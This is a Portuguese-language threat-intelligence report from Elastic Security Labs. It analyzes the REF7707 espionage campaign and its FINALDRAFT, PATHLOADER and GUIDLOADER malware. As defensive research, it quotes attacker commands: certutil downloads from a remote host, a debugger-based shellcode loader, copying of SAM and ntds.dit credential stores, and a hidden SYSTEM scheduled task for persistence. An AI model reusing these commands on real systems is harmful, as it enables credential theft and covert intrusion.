Da América do Sul ao Sudeste Asiático: A frágil teia do REF7707

REF7707 resumido

O Elastic Security Labs vem monitorando uma campanha que tem como alvo o Ministério das Relações Exteriores de um país sul-americano que tem vínculos com outros comprometimentos no Sudeste Asiático. Rastreamos esta campanha como REF7707.

Embora a campanha REF7707 seja caracterizada por um conjunto de intrusão inovador, bem projetado e altamente capaz, os proprietários da campanha exibiram uma gestão de campanha ruim e práticas de evasão inconsistentes.

O conjunto de intrusão utilizado pelo REF7707 inclui novas famílias de malware que chamamos de FINALDRAFT, GUIDLOADER e PATHLOADER. Fornecemos uma análise detalhada de suas funções e capacidades no relatório de análise de malware REF7707 - Você tem malware: FINALDRAFT se esconde em seus rascunhos.

Principais conclusões

• REF7707 alavancou novo malware contra múltiplos alvos
• O malware FINALDRAFT tem uma variante para Windows e Linux
• REF7707 usou um LOLBin incomum para obter execução de ponto final
• Uso intenso de serviços de nuvem e de terceiros para C2
• Os invasores usaram segurança operacional fraca que expôs malware e infraestrutura adicionais não utilizados nesta campanha

Visão geral da campanha

No final de novembro de 2024, o Elastic Security Labs observou um grande número de alertas comportamentais de endpoint ocorrendo no Ministério das Relações Exteriores de um país sul-americano. À medida que a investigação prosseguia, descobrimos uma ampla campanha e um conjunto de intrusões que incluíam novos malwares, segmentação sofisticada e uma cadência operacional madura.

Embora partes da campanha tenham demonstrado um alto nível de planejamento e competência técnica, vários descuidos táticos expuseram amostras de pré-produção de malware, infraestrutura e vítimas adicionais.

Layout da campanha (modelo diamante)

O Elastic Security Labs utiliza o Modelo Diamond para descrever relacionamentos de alto nível entre adversários, recursos, infraestrutura e vítimas de intrusões. Embora o Modelo Diamante seja mais comumente usado com intrusões únicas e aproveitando o Activity Threading (seção 8) para criar relacionamentos entre incidentes, um modelo centrado no adversário (seção 7.1.4) abordagem permite um único diamante — embora desordenado.

Fluxo de execução

Cadeia de execução primária

O REF7707 foi identificado inicialmente por meio da telemetria do Elastic Security do Ministério das Relações Exteriores de um país sul-americano. Observamos uma tática comum do LOLBin usando o aplicativo certutil da Microsoft para baixar arquivos de um servidor remoto e salvá-los localmente.

certutil  -urlcache -split -f https://[redacted]/fontdrvhost.exe C:\ProgramData\fontdrvhost.exe

certutil  -urlcache -split -f https://[redacted]/fontdrvhost.rar C:\ProgramData\fontdrvhost.rar

certutil  -urlcache -split -f https://[redacted]/config.ini C:\ProgramData\config.ini

certutil  -urlcache -split -f https://[redacted]/wmsetup.log C:\ProgramData\wmsetup.log

O servidor web que hospeda fontdrvhost.exe, fontdrvhost.rar, config.ini e wmsetup.log estava localizado na mesma organização; no entanto, não estava executando o Elastic Agent. Este foi o primeiro movimento lateral observado e forneceu informações sobre a intrusão. Discutiremos esses arquivos com mais detalhes, mas, por enquanto, fontdrvhost.exe é uma ferramenta de depuração, config.ini é um arquivo INI armado e fontdrvhost.rar não era recuperável.

WinrsHost.exe

Plug-in Remote Shell do Gerenciamento Remoto do Windows (WinrsHost.exe) foi usado para baixar os arquivos para este sistema de um sistema de origem desconhecido em uma rede conectada. O plugin é o processo do lado do cliente usado pelo Gerenciamento Remoto do Windows. Isso indica que os invasores já possuíam credenciais de rede válidas e as estavam usando para movimentação lateral de um host previamente comprometido no ambiente. Não se sabe como essas credenciais foram obtidas; é possível que elas tenham sido obtidas do servidor web que hospeda os arquivos suspeitos.

O invasor baixou fontdrvhost.exe, fontdrvhost.rar, config.ini e wmsetup.log para o diretório C:\ProgramData\ ; de lá, o invasor foi para vários outros endpoints do Windows. Embora não possamos identificar todas as credenciais expostas, notamos o uso de uma conta de administrador local para baixar esses arquivos.

Após os downloads do servidor web para o endpoint, vimos um conjunto de regras comportamentais sendo disparadas em rápida sucessão.

Em seis sistemas Windows, observamos a execução de um binário não identificado (08331f33d196ced23bb568689c950b39ff7734b7461d9501c404e2b1dc298cc1) como filho de Services.exe. Este binário suspeito usa um nome de arquivo atribuído pseudoaleatoriamente, composto por seis letras maiúsculas e minúsculas com uma extensão .exe e está localizado no caminho C:\Windows\ (exemplo: C:\Windows\cCZtzzwy.exe). Não conseguimos coletar este arquivo para análise, mas inferimos que esta é uma variante do PATHLOADER com base no tamanho do arquivo (170,495 bytes) e sua localização. Este arquivo foi passado entre sistemas usando SMB.

FontDrvHost.exe

Depois que o invasor coletou fontdrvhost.exe, fontdrvhost.rar, config.ini e wmsetup.log, ele executou fontdrvhost.exe (cffca467b6ff4dee8391c68650a53f4f3828a0b5a31a9aa501d2272b683205f9) para continuar com a intrusão. fontdrvhost.exe é uma versão renomeada do depurador assinado pelo Windows CDB.exe. O abuso desse binário permitiu que nossos invasores executassem shellcode malicioso entregue no arquivo config.ini sob o disfarce de binários confiáveis.

CDB é um depurador com mais de 15 anos. Ao pesquisar a frequência com que ele foi enviado com arquivos suspeitos para o VirusTotal, vemos um aumento na atividade em 2021 e uma aceleração agressiva a partir do final de 2024.

CDB é um arquivo LOLBas documentado, mas não há muitas pesquisas publicadas sobre como ele pode ser abusado. O pesquisador de segurança mrd0x escreveu uma ótima análise do CDB descrevendo como ele pode ser usado para executar shellcode, iniciar executáveis, executar DLLs, executar comandos shell e encerrar soluções de segurança (e até mesmo uma análise mais antiga de 2016 usando-o como um executor de shellcode). Embora não seja uma novidade, essa é uma metodologia de ataque incomum e pode ser usada com outros metadados de intrusão para vincular atores entre campanhas.

Embora config.ini não tenha sido coletado para análise, ele continha um mecanismo por meio do qual fontdrvhost.exe carregava shellcode; a forma como ele foi invocado é semelhante ao FINALDRAFT.

C:\ProgramData\fontdrvhost.exe -cf C:\ProgramData\config.ini -o C:\ProgramData\fontdrvhost.exe

• -cf - especifica o caminho e o nome de um arquivo de script. Este arquivo de script é executado assim que o depurador é iniciado
• config.ini - este é o script a ser carregado
• -o - depura todos os processos iniciados pelo aplicativo de destino

Então fontdrvhost.exe gerou mspaint.exe e injetou shellcode nele.

Os engenheiros reversos do Elastic Security Labs analisaram esse shellcode para identificar e caracterizar o malware FINALDRAFT. Por fim, fontdrvhost.exe injetou shellcode adicional na memória (6d79dfb00da88bb20770ffad636c884bad515def4f8e97e9a9d61473297617e3) que também foi identificado como o malware FINALDRAFT.

Conforme descrito na análise do FINALDRAFT, o malware assume como padrão mspaint.exe ou conhost.exe se nenhum parâmetro de destino for fornecido para um comando relacionado à injeção.

Verificações de conectividade

O adversário realizou vários testes de conectividade usando o comando ping.exe e via PowerShell.

O cmdlet Invoke-WebRequest do Powershell é semelhante ao wget ou curl, que extrai o conteúdo de um recurso da web. Este cmdlet pode ser usado para baixar ferramentas da linha de comando, mas esse não foi o caso aqui. Essas solicitações em contexto com vários pings têm mais probabilidade de serem verificações de conectividade.

graph.microsoft[.]com e login.microsoftonline[.]com são sites legítimos da Microsoft que fornecem tráfego de API e GUI da Web para o serviço de e-mail em nuvem Outlook da Microsoft e outros produtos do Office 365 .

• ping graph.microsoft[.]com
• ping www.google[.]com
• Powershell Invoke-WebRequest -Uri \"hxxps://google[.]com\
• Powershell Invoke-WebRequest -Uri \"hxxps://graph.microsoft[.]com\" -UseBasicParsing
• Powershell Invoke-WebRequest -Uri \"hxxps://login.microsoftonline[.]com\" -UseBasicParsing

digert.ictnsc[.]com e support.vmphere[.]com eram infraestruturas de propriedade do adversário.

• ping digert.ictnsc[.]com
• Powershell Invoke-WebRequest -Uri \"hxxps://support.vmphere[.]com\" -UseBasicParsing

Abordamos mais sobre esses domínios de rede na seção de infraestrutura abaixo.

Reconhecimento / enumeração / coleta de credenciais

O adversário executou um script desconhecido chamado SoftwareDistribution.txt usando o utilitário diskshadow.exe , extraiu os hives SAM, SECURITY e SYSTEM Registry e copiou o banco de dados do Active Directory (ntds.dit). Esses materiais contêm principalmente credenciais e metadados de credenciais. O adversário usou o utilitário 7zip para compactar os resultados:

diskshadow.exe /s C:\\ProgramData\\SoftwareDistribution.txt

cmd.exe /c copy z:\\Windows\\System32\\config\\SAM C:\\ProgramData\\[redacted].local\\SAM /y

cmd.exe /c copy z:\\Windows\\System32\\config\\SECURITY C:\\ProgramData\\[redacted].local\\SECURITY /y

cmd.exe /c copy z:\\Windows\\System32\\config\\SYSTEM C:\\ProgramData\\[redacted].local\\SYSTEM /y

cmd.exe /c copy z:\\windows\\ntds\\ntds.dit C:\\ProgramData\\[redacted].local\\ntds.dit /y

7za.exe a [redacted].local.7z \"C:\\ProgramData\\[redacted].local\\\"

O adversário também enumerou informações sobre o sistema e o domínio:

systeminfo

dnscmd . /EnumZones

net group /domain

C:\\Windows\\system32\\net1 group /domain

quser

reg query HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UUID

reg query \"HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UUID\"

reg query \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UUID\"

Persistência

A persistência foi alcançada usando uma Tarefa Agendada que invocava o depurador CDB.exe renomeado e o arquivo INI transformado em arma a cada minuto como SYSTEM. Essa metodologia garantiu que FINALDRAFT residisse na memória.

schtasks /create /RL HIGHEST /F /tn \"\\Microsoft\\Windows\\AppID\\EPolicyManager\" 
/tr \"C:\\ProgramData\\fontdrvhost.exe -cf C:\\ProgramData\\config.ini -o C:\\ProgramData\\fontdrvhost.exe\" 
/sc MINUTE /mo 1 /RU SYSTEM

• schtasks - o programa de tarefas agendadas
• /create - cria uma nova tarefa agendada
• /RL HIGHEST - especifica o nível de execução do trabalho, HIGHEST é executado com o nível mais alto de privilégios
• /F - suprimir avisos
• /tn \\Microsoft\\Windows\\AppID\\EPolicyManager\ - nome da tarefa, tentando espelhar uma tarefa agendada com aparência autêntica
• /tr \"C:\\ProgramData\\fontdrvhost.exe -cf C:\\ProgramData\\config.ini -o C:\\ProgramData\\fontdrvhost.exe\" - tarefa a ser executada, neste caso os comandos fontdrvhost.exe que abordamos anteriormente
• /sc MINUTE - tipo de programação, MINUTE especifica a execução em intervalos de minutos
• /mo 1 - modificador, define 1 para o intervalo de agendamento
• /RU SYSTEM - define qual conta será executada; nessa situação, a tarefa será executada como o usuário SYSTEM

Análise FINALDRAFT

Uma análise técnica aprofundada descrevendo os recursos e a arquitetura do malware FINALDRAFT e PATHLOADER está disponível aqui. Em um nível alto, o FINALDRAFT é uma ferramenta de administração remota completa e bem projetada, com a capacidade de aceitar módulos complementares que estendem a funcionalidade e o tráfego de rede proxy internamente por vários meios.

Embora o FINALDRAFT possa estabelecer comando e controle usando vários meios, os mais notáveis são os meios que observamos em nosso ambiente de vítima: abuso da API Graph da Microsoft. Observamos pela primeira vez esse tipo de C2 de terceiros no SIESTAGRAPH, que relatamos em dezembro de 2022.

Esse tipo de comando e controle é desafiador para defensores de organizações que dependem muito da visibilidade da rede para serem detectados. Após a conclusão da execução inicial e do check-in, toda a comunicação posterior prossegue por meio da infraestrutura legítima da Microsoft (graph.microsoft[.]com) e se mistura com as outras estações de trabalho da organização. Ele também suporta a funcionalidade de retransmissão que permite o tráfego de proxy para outros sistemas infectados. Ele evita defesas que dependem de detecção de intrusão baseada em rede e indicadores de inteligência de ameaças.

PATHLOADER e GUIDLOADER

Tanto o PATHLOADER quanto o GUIDLOADER são usados para baixar e executar shellcodes criptografados na memória. Eles foram descobertos no VirusTotal durante a investigação da infraestrutura C2 e das sequências identificadas em uma captura de memória FINALDRAFT. Eles só foram observados em associação com cargas úteis FINALDRAFT.

Uma amostra de maio 2023 no VirusTotal é o binário mais antigo identificado do conjunto de intrusão REF7707. Este exemplo foi enviado pela primeira vez por um usuário da web da Tailândia, dwn.exe (9a11d6fcf76583f7f70ff55297fb550fed774b61f35ee2edd95cf6f959853bcf) é uma variante do PATHLOADER que carrega um binário FINALDRAFT criptografado de poster.checkponit[.]com e support.fortineat[.]com.

Entre junho e agosto de 2023, um usuário do site VirusTotal de Hong Kong carregou 12 amostras do GUIDLOADER. Cada uma dessas amostras teve pequenas modificações na forma como a carga criptografada foi baixada e foram configuradas para usar domínios FINALDRAFT:

• poster.checkponit[.]com
• support.fortineat[.]com
• Google Firebase (firebasestorage.googleapis[.]com)
• Pastebin (pastebin[.]com)
• Um sistema de armazenamento web público da Universidade do Sudeste Asiático

Alguns exemplos do GUIDLOADER parecem inacabados ou quebrados, com rotinas de descriptografia não funcionais, enquanto outros contêm strings de depuração incorporadas no binário. Essas variações sugerem que as amostras faziam parte de um processo de desenvolvimento e teste.

FINALDRAFT bridging OS’

No final de 2024, duas variantes do Linux ELF FINALDRAFT foram carregadas no VirusTotal, uma dos Estados Unidos e uma do Brasil. Esses exemplos apresentam versatilidade C2 semelhante e uma reimplementação parcial dos comandos disponíveis na versão Windows. URLs foram extraídos desses arquivos para support.vmphere[.]com, update.hobiter[.]com e pastebin.com.

Análise de Infraestrutura

No relatório de análise de malware FINALDRAFT, vários domínios foram identificados nas amostras coletadas na intrusão REF7707, e outras amostras foram identificadas por similaridade de código.

Hashes de banner de serviço

Uma pesquisa do Censys por hobiter[.]com (o domínio observado na variante ELF do FINALDRAFT, discutido na seção anterior) retorna um endereço IP de 47.83.8.198. Este servidor é baseado em Hong Kong e atende as portas 80 e 443. A string “hobiter[.]com” está associada ao certificado TLS na porta 443. Uma consulta dinâmica do Censys no hash do banner de serviço desta porta produz seis servidores adicionais que compartilham esse hash (sete no total).

Dois servidores (203.232.112[.]186 e 13.125.236[.]162) não compartilham o mesmo perfil que os outros cinco. Embora o hash do banner de serviço ainda corresponda, ele não está na porta 443, mas nas portas 15701, 15702, 15703 e 15709. Além disso, as portas em questão não parecem suportar comunicações TLS. Não os atribuímos ao REF7707 com alto grau de confiança, mas os incluímos para fins de completude.

Os outros cinco servidores, incluindo o servidor original “hobiter”, compartilham várias semelhanças:

• Correspondência de hash do banner de serviço na porta 443
• Geolocalizações do Sudeste Asiático
• Windows OS
• Certificados TLS emitidos pela Cloudflare
• A maioria tem o mesmo ASN pertencente ao Alibaba

Hobiter e VMphere

update.hobiter[.]com e support.vmphere[.]com foram encontrados em um binário ELF (biosets.rar) de dezembro 13, 2024. Ambos os domínios foram registrados mais de um ano antes, em setembro 12, 2023. Este binário ELF apresenta versatilidade C2 semelhante e uma reimplementação parcial dos comandos disponíveis na versão Windows do FINALDRAFT.

Uma pesquisa de servidor de nomes de hobiter[.]com e vmphere[.]com produz apenas um registro de servidor de nomes Cloudflare para cada um e nenhum registro A. A busca por seus subdomínios conhecidos nos fornece registros A apontando para endereços IP de propriedade da Cloudflare.

CITNSC

ictnsc[.]com está diretamente associado à intrusão REF7707 acima de uma verificação de conectividade (ping digert.ictnsc[.]com) realizada pelos invasores. O servidor associado a este domínio (8.213.217[.]182) foi identificado por meio do hash do banner de serviço Censys no serviço HTTPS descrito acima. Assim como a outra infraestrutura identificada, o subdomínio é resolvido para endereços IP de propriedade da Cloudflare, e o domínio pai tem apenas um registro NS da Cloudflare. ictnsc[.]com foi registrado em fevereiro 8, 2023.

Embora não possamos confirmar a associação como maliciosa, vale ressaltar que o domínio ict.nsc[.]ru é propriedade da web do Centro Federal de Pesquisa em Tecnologias da Informação e Computacional, frequentemente chamado de FRC ou ICT. Esta organização russa conduz pesquisas em diversas áreas, como modelagem computacional, engenharia de software, processamento de dados, inteligência artificial e computação de alto desempenho.

Embora não tenha sido observado na intrusão REF7707, o domínio que observamos (ictnsc[.]com) tem um subdomínio ict (ict.ictnsc[.]com), que é surpreendentemente semelhante a ict.nsc[.]ru. Novamente, não podemos confirmar se eles estão relacionados ao FRC ou ITC legítimo. Parece que o agente da ameaça pretendia que os domínios fossem semelhantes, combinados ou confundidos entre si.

Autodiscovar

Autodiscovar[.]com não foi diretamente associado a nenhum malware FINALDRAFT. Ele foi indiretamente associado à infraestrutura REF7707 por meio de pivôs em identificadores de infraestrutura da web. O domínio pai tem apenas um registro NS do Cloudflare. Um subdomínio identificado pelo VirusTotal (cloud.autodiscovar[.]com) aponta para endereços IP de propriedade da Cloudflare. Este nome de domínio se assemelha a outras infraestruturas web FINALDRAFT e REF7707 e compartilha o hash do banner de serviço HTTPS. Este domínio foi registrado em agosto 26, 2022.

D-links e nuvens VM

d-links[.]net e vm-clouds[.]net foram registrados em setembro 12, 2023, o mesmo dia que hobiter[.]com e vmphere[.]com. Os servidores que hospedam esses sites também compartilham o mesmo hash de banner de serviço HTTPS. Eles não estão diretamente associados ao malware FINALDRAFT nem possuem subdomínios roteáveis atualmente, embora pol.vm-clouds[.]net tenha sido registrado anteriormente.

Fortineat

support.fortineat[.]com foi codificado no exemplo PATHLOADER (dwn.exe). Durante nossa análise do domínio, descobrimos que ele não estava registrado no momento. Para identificar quaisquer outras amostras que se comunicassem com o domínio, nossa equipe registrou esse domínio e configurou um servidor web para escutar conexões de entrada.

Registramos tentativas de conexão pela porta 443, onde identificamos um padrão específico de bytes de entrada. As conexões foram originadas de oito empresas diferentes de telecomunicações e infraestrutura de Internet no Sudeste Asiático, indicando possíveis vítimas do conjunto de intrusão REF7707.

Ponto de verificação

poster.checkponit[.]com foi observado em quatro amostras GUIDLOADER e uma amostra PATHLOADER entre maio e julho de 2023, e foi usado para hospedar o shellcode criptografado FINALDRAFT. O registro checkponit[.]com foi criado em agosto 26, 2022. Atualmente não há registros A para checkponit[.]com ou poster.checkponit[.]com.

Infraestrutura de terceiros

O graph.microsoft[.]com da Microsoft é usado pelas variantes FINALDRAFT PE e ELF para comando e controle por meio da API Graph. Este serviço é onipresente e usado para processos comerciais críticos de empresas que usam o Office 365. Os defensores são altamente encorajados a NÃO bloquear este domínio, a menos que as ramificações comerciais sejam compreendidas.

O serviço Firebase do Google (firebasestorage.googleapis[.]com), o Pastebin (pastebin[.]com) e uma universidade do Sudeste Asiático são serviços de terceiros usados para hospedar a carga criptografada para os carregadores (PATHLOADER e GUIDLOADER) para baixar e descriptografar o último estágio do FINALDRAFT.

Linha do tempo REF7707

Conclusão

O REF7707 foi descoberto durante a investigação de uma invasão no Ministério das Relações Exteriores de um país sul-americano.

A investigação revelou novos malwares como o FINALDRAFT e seus vários carregadores. Essas ferramentas foram implantadas e suportadas usando recursos integrados do sistema operacional que são difíceis de detectar por ferramentas antimalware tradicionais.

O FINALDRAFT coopta o serviço de API gráfica da Microsoft para comando e controle a fim de minimizar indicadores maliciosos que seriam observáveis por sistemas tradicionais de detecção e prevenção de intrusão baseados em rede. Plataformas de hospedagem de terceiros para preparação de carga criptografada também desafiam esses sistemas no início da cadeia de infecção.

Uma visão geral dos remetentes e pivôs do VirusTotal usando os indicadores neste relatório mostra uma presença geográfica relativamente forte no Sudeste Asiático e na América do Sul. O SIESTAGRAPH, da mesma forma, foi o primeiro abuso de API de gráfico que observamos, e ele (REF2924) envolveu um ataque ao Ministério das Relações Exteriores de um país do Sudeste Asiático.

No Elastic Security Labs, defendemos recursos defensivos em domínios de segurança da informação operados por profissionais experientes para mitigar melhor as ameaças avançadas.

REF7707 através do MITRE ATT&CK

A Elastic usa a estrutura MITRE ATT&CK para documentar táticas, técnicas e procedimentos comuns que ameaças persistentes avançadas usam contra redes corporativas.

• Reconhecimento
• Execução
• Persistência
• Escalação de privilégios
• Defense Evasion
• Acesso a credenciais
• Descoberta
• Movimento lateral
• Coleta
• Command and Control (Comando e controle)
• Exfiltração

Detectando REF7707

YARA

• FINALDRAFT (Windows)
• FINALDRAFT (Linux)
• FINALDRAFT (Multi-SO)
• CARREGADOR DE CAMINHO
• CARREGADOR DE GUIA

Observações

Os seguintes observáveis foram discutidos nesta pesquisa.

Referências

Os seguintes itens foram referenciados ao longo da pesquisa acima:

• https://www.elastic.co/pt/security-labs/finaldraft
• https://mrd0x.com/the-power-of-cdb-debugging-tool/
• https://web.archive.org/web/20210305190100/http://www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html

Sobre o Elastic Security Labs

O Elastic Security Labs se dedica a criar mudanças positivas no cenário de ameaças, fornecendo pesquisas disponíveis publicamente sobre ameaças emergentes.

Siga o Elastic Security Labs no X @elasticseclabs e confira nossa pesquisa em www.elastic.co/security-labs/. Você pode ver a tecnologia que utilizamos para esta pesquisa e muito mais, acessando o Elastic Security.